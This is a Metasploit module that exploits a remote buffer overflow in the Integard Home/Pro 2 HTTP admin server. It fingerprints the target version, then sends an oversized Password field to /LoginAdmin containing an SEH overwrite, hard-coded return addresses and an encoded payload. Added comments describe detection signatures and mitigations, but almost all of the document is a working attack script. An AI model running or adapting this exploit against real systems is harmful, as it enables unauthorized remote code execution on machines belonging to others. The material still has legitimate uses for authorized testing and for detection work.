Integard Home and Pro 2 - Remote HTTP Buffer Overflow Exploit



# Metasploit exploit module for the Integard Home/Pro 2 HTTP server.
# Fingerprints the server version by the size of /banner.jpg, then sends an
# oversized "Password" form field to /LoginAdmin with an SEH-style overwrite.
#
# Defender notes (derived from the request shapes below):
#  - Detection: a GET for /banner.jpg followed by a POST to /LoginAdmin whose
#    Password field is ~3 KB of upper-case letters plus non-printable bytes;
#    the module also sends a fixed Host header of 192.168.1.1:18881 that need
#    not match the real target, which is a usable signature on its own.
#  - Mitigation: the default service port is 18881 (see register_options);
#    restricting network access to the admin interface limits exposure until
#    the vendor fix referenced in 'References' is applied.
class Metasploit3 < Msf::Exploit::Remote


    include Msf::Exploit::Remote::HttpClient

    # Declares module metadata, payload constraints and targets.
    # @param info [Hash] metadata merged by Msf::Exploit::Remote#initialize
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Integard Home/Pro version 2.0',
            'Description'    => %q{
                    Exploit for Integard HTTP Server, vulnerability discovered by Lincoln
            },
            'Author'  =>
                [
                    'Lincoln',
                    'Nullthreat',
                    'rick2600',
                    'corelanc0d3r' 
                ],
            'License'       => MSF_LICENSE,
            'Version'       => '$Revision: $',
            'References'    =>
                [
                    ['URL','http://www.corelan.be:8800/advisories.php?id=CORELAN-10-061'],
                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'thread',
                },
            # BadChars are all HTTP form-encoding delimiters (NUL, space, &, /, =, ?, \);
            # presumably excluded because the payload travels inside a POST form body.
            'Payload'        =>
                {
                    'Space'    => 2000,
                    'BadChars'  => "\x00\x20\x26\x2f\x3d\x3f\x5c",
                    'StackAdjustment' => -1500,
                },
            'Platform'       => 'win',
            'Privileged'     => false,
            # Target 0 triggers the Content-Length fingerprint in #exploit; targets 1
            # and 2 carry the per-version SEH return address ('Ret').
            'Targets'        =>
                [
                    [ 'Automatic Targeting',          { 'auto' => true }],
                    [ 'Integard Home 2.0.0.9021', { 'Ret' => 0x0041565E,}],
                    [ 'Integard Pro  2.2.0.9026', { 'Ret' => 0x0040362C,}],
                ],
            'DefaultTarget'  => 0))

        # Integard's HTTP admin interface listens on 18881 by default.
        register_options(
            [
                Opt::RPORT(18881)
            ], self.class )
    end


    # Entry point invoked by the framework: fingerprint (when 'auto'), build the
    # overflow buffer, POST it to /LoginAdmin and start the payload handler.
    # Prints "[-] Unknown Version" and sends nothing if the fingerprint matches
    # neither known Content-Length.
    def exploit
        mytarget = target
        continueattack=true
        if(target['auto'])
            mytarget = nil
            print_status("[*] Automatically detecting the target...")
            connect
            # Version fingerprint: the byte size of /banner.jpg differs per edition.
            # The header value is compared as a string, so only exact matches select
            # a target. (A timed-out request is not handled here.)
            response = send_request_raw(
            {'uri' => '/banner.jpg', 
            'version' => '1.1', 
            'method' => 'GET'
            }, 5)
            contlength = response['Content-Length']
            if (contlength == "24584")
                print_status("[!] Found Version - Integard Home")
                mytarget = self.targets[1]
            elsif (contlength == "23196")
                print_status("[!] Found Version - Integard Pro")
                mytarget = self.targets[2]
            else
                print_status("[-] Unknown Version")
                continueattack=false
            end
            disconnect
        end
        if continueattack
            print_status("[!] Selected Target: #{mytarget.name}")
            print_status("[*] Building Buffer")
            # Buffer layout (total 3091 bytes before jmp): random upper-case filler,
            # encoded payload, short jump, nSEH, then the target's SEH address
            # packed little-endian. The filler length shrinks as the payload grows.
            pay = payload.encoded
            junk = rand_text_alpha_upper(3091 - pay.length)
            jmp = "\xE9\x2B\xF8\xFF\xFF"
            nseh = "\xEB\xF9\x90\x90"
            seh = [mytarget.ret].pack('V')
            buffer = junk + pay + jmp + nseh + seh
            print_status("[*] Sending Request")
            # The overflow is carried in the Password field of the login form; the
            # remaining form fields mirror a normal /LoginAdmin submission.
            post_data = "Password=" + buffer + "&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=0&LoginButtonName=Login"
            req = "/LoginAdmin"
            connect
            # NOTE: Host and Content-Length are hard-coded literals rather than derived
            # from RHOST/RPORT or post_data.length, so they will generally not match
            # the real target or body size — a stable signature for network detection.
            send_request_raw({
                'uri' => req,
                'version' => '1.1',
                'method' => 'POST',
                'headers' => 
                    {
                    'Host' => '192.168.1.1:18881',
                    'Content-Length' => 1074
                    },
                'data' => post_data
                }, 5)
            print_status("[*] Request Sent")
            # Hands off to the framework's payload handler.
            handler
        end
    end
end